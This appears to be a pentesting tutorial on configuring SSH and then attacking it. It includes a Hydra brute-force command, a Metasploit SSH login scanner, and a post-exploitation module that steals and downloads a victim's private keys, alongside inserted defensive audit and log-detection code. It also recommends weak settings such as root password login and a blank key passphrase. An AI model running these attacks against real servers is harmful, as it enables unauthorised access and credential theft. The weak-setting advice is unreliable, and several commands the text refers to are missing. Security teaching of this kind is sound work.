What is SSH
Secure Shell (SSH) is used to remotely access a server or any computer with SSH enabled. It is the natural replacement for the telnet protocol: telnet is not secure, whereas SSH encrypts the communication. By default SSH uses TCP port 22 for the SSH service. SSH allows the client to connect to the remote system through the command line. We will look at how to configure SSH and how to pentest it.
Installing and configuring SSH Server
It's very easy to install SSH on any system like Kali, Ubuntu or any other Linux distribution. I am using an Ubuntu system to install the SSH server.
apt-get install openssh-server
With the above command you can install the SSH service on your system. Once the installation is finished, type
service ssh start
to start the SSH service. To confirm it is running, we will scan our IP address with Nmap for port 22:
nmap -p 22 localhost -sV
Nmap will check whether port 22 is open and, if so, which service is running on it. Once you confirm that SSH is running, we can look at what we can do to secure it, which is also what we check during pentesting. Let's try to connect to our Ubuntu server from a different system. Here my Ubuntu system's IP address is 192.168.75.130.
Here I am using a Windows system to connect to our Ubuntu machine. Windows has an SSH client installed, so we can use it from PowerShell or CMD.
Type the above command in your PowerShell/CMD and then enter the root password. You will get a permission denied error, and it's important to understand why: by default SSH won't allow you to connect to the server as the root user, but you can connect as any other user. Here on my Ubuntu machine I have another user, allabouthack.
Again it will ask for the password of the allabouthack user, and after entering the right credentials I will be connected to the Ubuntu system. Now I can do anything on the Ubuntu machine from my Windows machine through the Ubuntu system's terminal.
SSH ROOT USER
Now, as I said, by default you can't access the root user through SSH. To access the root user we have to change the configuration. We need to edit the ssh_config file on our Ubuntu server.
From this file find
PermitRootLogin without-password and replace it with
PermitRootLogin yes, then restart your SSH service with
sudo service ssh restart and try again to connect as the root user with SSH. This time you can connect as root.
Changing the Default Port
Many organizations change the default port number for services, which doesn't make much sense except to waste the attacker's time. If an attacker wants to target the SSH service he will scan for port 22, and if SSH is running on a different port then the attacker will either think SSH is not running or has to scan more ports to find which one is running SSH.
Open the same config file and find
Port 22 and change it to any port you want. I am changing it to
1234, then restart the SSH service with
sudo service ssh restart. To confirm that the port has changed we can scan for the new port with Nmap,
or we can try to connect with SSH on port 22 and we will get an error. When you run SSH on a different port you can't use the above command to connect; you have to specify the port:
ssh [email protected] -p 1234
SSH RSA KEY
SSH allows us to connect to the server without a password with the help of an RSA public/private key pair. This is useful for security: we can block password-based authentication and authenticate with the RSA key only, so even if the password is leaked or is weak enough for a dictionary attack, the attacker still can't connect.
We need to create an RSA key pair. The public key will be saved on the server and the private key on the client machine. There are multiple ways and tools available to do this. First, we create the keys on our Ubuntu server.
$ ssh-keygen
$ cd /root/.ssh
$ cp id_rsa.pub /root/.ssh/authorized_keys
$ ls
First, we create the key with
ssh-keygen. It will ask for a passphrase for an extra layer of protection; keep it blank. Now we go to the .ssh directory and copy the public key into the authorized_keys file with the cp command. Now type ls and confirm it.
Now we need to transfer the
id_rsa file to the client machine, which is Windows. You can use any method, like a drive or a local server, to transfer it. Now you have to move that file to your user location inside
Now you can try to connect to the SSH server and it won't ask for a password. But the server will still accept the password, so we have to block it so that SSH accepts only the RSA key and rejects passwords. We need to configure the ssh file again.
Now change the
PasswordAuthentication yes with
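Added example, not part of the original post: a small Python checker for the directives changed above (PermitRootLogin, Port, PasswordAuthentication). Note that the server daemon reads /etc/ssh/sshd_config (ssh_config is the client-side file); the two sample configs in the block are constructed, and the defaults assumed are those of a recent OpenSSH.

```python
"""Audit the sshd_config directives changed on this page (added example, not
from the original post). The sample configs below are constructed; defaults
are those of a recent OpenSSH (assumption)."""
import re

DEFAULTS = {"permitrootlogin": "prohibit-password", "port": "22",   # value when absent
            "passwordauthentication": "yes", "pubkeyauthentication": "yes"}

def parse_sshd_config(text):
    """Map lower-cased directive -> value; sshd keeps the FIRST occurrence."""
    settings = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop comments / blank lines
        if not line:
            continue
        if line.lower().startswith("match"):     # conditional blocks: stop here
            break
        parts = re.split(r"[\s=]+", line, maxsplit=1)
        if len(parts) == 2 and parts[0].lower() not in settings:
            settings[parts[0].lower()] = parts[1].strip()
    return settings

def audit(text):
    """Return findings for the settings this page touches, weakest first."""
    cfg = {**DEFAULTS, **parse_sshd_config(text)}
    findings = []
    if cfg["permitrootlogin"] == "yes":
        findings.append("PermitRootLogin yes: root can log in with a password; prefer prohibit-password or no")
    if cfg["passwordauthentication"] == "yes":
        findings.append("PasswordAuthentication yes: password guessing still works; set no once keys are in place")
    if cfg["pubkeyauthentication"] != "yes":
        findings.append("PubkeyAuthentication off: key-only login is impossible")
    if cfg["port"] == "22":
        findings.append("Port 22: default port (informational, not a security control)")
    return findings

WEAK_CONFIG = """# constructed: sshd_config after the changes described above
Port 1234
PermitRootLogin yes
PasswordAuthentication yes
"""
HARDENED_CONFIG = """# constructed: key-only login, no root password login
Port 1234
PermitRootLogin prohibit-password
PasswordAuthentication no
PubkeyAuthentication yes
"""
if __name__ == "__main__":
    for name, text in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(name, audit(text) or ["no findings"])
```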
We can perform brute-force with Hydra and Metasploit. I will show you how to perform brute force with both. Let's first take a look at how to do it with Hydra.
hydra -l root -P password.txt 192.168.75.130 ssh -t 5
First, we are using -l for the username; you can use -L if you have a list of usernames. Then -P gives the password list location, followed by the IP address, the service and the number of threads (-t).
use auxiliary/scanner/ssh/ssh_login
set RHOSTS 192.168.75.130
set USERPASS_FILE /home/pentesting/password.txt
set VERBOSE True
set USERNAME root
run
With the above options you can perform brute-force with Metasploit. Again we are using a single username; if you have multiple usernames in a file then use
USERPASS_FILE /home/password.txt. Obviously, you have to change the location of the wordlist.
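On the server side, the password guessing shown above leaves "Failed password" lines in sshd's auth.log. Added example, not part of the original post: a Python detector that flags sources with many failures in a short sliding window; the log lines are constructed, and the traditional syslog format is assumed.

```python
"""Flag SSH password-guessing runs from sshd auth.log lines (added example).
Log lines below are constructed; format assumed: 'Mon DD HH:MM:SS host sshd[pid]: ...'."""
import re
from collections import defaultdict
from datetime import datetime

FAILED = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+")

def parse_failures(lines, year=2024):
    """Yield (timestamp, user, source_ip) for every failed-password line."""
    for line in lines:
        m = FAILED.match(line)
        if m:
            yield datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S"), m["user"], m["ip"]

def detect_bruteforce(lines, threshold=5, window_seconds=60):
    """Return {ip: (total_failures, users_tried)} for every source with at
    least `threshold` failures inside some `window_seconds` sliding window."""
    by_ip = defaultdict(list)
    for ts, user, ip in parse_failures(lines):
        by_ip[ip].append((ts, user))
    hits = {}
    for ip, events in by_ip.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            # shrink the window from the left until it spans <= window_seconds
            while (events[end][0] - events[start][0]).total_seconds() > window_seconds:
                start += 1
            if end - start + 1 >= threshold:
                hits[ip] = (len(events), sorted({u for _, u in events}))
                break
    return hits

# Constructed sample: one source hammering root, one typo from a legitimate host
SAMPLE_LOG = [
    "Mar 10 12:00:01 ubuntu sshd[2201]: Failed password for root from 192.168.75.1 port 50001 ssh2",
    "Mar 10 12:00:02 ubuntu sshd[2203]: Failed password for root from 192.168.75.1 port 50002 ssh2",
    "Mar 10 12:00:02 ubuntu sshd[2205]: Failed password for invalid user admin from 192.168.75.1 port 50003 ssh2",
    "Mar 10 12:00:03 ubuntu sshd[2207]: Failed password for root from 192.168.75.1 port 50004 ssh2",
    "Mar 10 12:00:04 ubuntu sshd[2209]: Failed password for root from 192.168.75.1 port 50005 ssh2",
    "Mar 10 12:00:05 ubuntu sshd[2211]: Accepted publickey for allabouthack from 192.168.75.20 port 50100 ssh2",
    "Mar 10 12:05:00 ubuntu sshd[2300]: Failed password for allabouthack from 192.168.75.20 port 50200 ssh2",
]
if __name__ == "__main__":
    for ip, (count, users) in detect_bruteforce(SAMPLE_LOG).items():
        print(f"{ip}: {count} failures, users tried: {', '.join(users)}")
```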
There are lots of different things you can do while pentesting a server with SSH enabled, like the password attack we have just seen, getting a Metasploit session with an SSH key, and stealing SSH keys.
Stealing SSH Keys
This attack requires a compromised server with an SSH server running. If you are able to compromise a server with Metasploit and the server has SSH running but requires a key to connect, you can steal the keys from the compromised server.
use post/multi/gather/ssh_creds
set session 4
exploit
Once you have compromised the server with Metasploit, send the session to the background and run the above post-exploitation module in Metasploit, setting the session id of your exploited server.
Once it finds a key, you have to start the session and download the key.
session 4
cd /home/username/.ssh
download id_rsa /home/
Once the key is downloaded you can find it in
the /home directory. If you have the key then you can use it to connect as we saw earlier. There are lots of other things you can do with SSH; in Metasploit you can check
use auxiliary/scanner/ssh to list all the options available.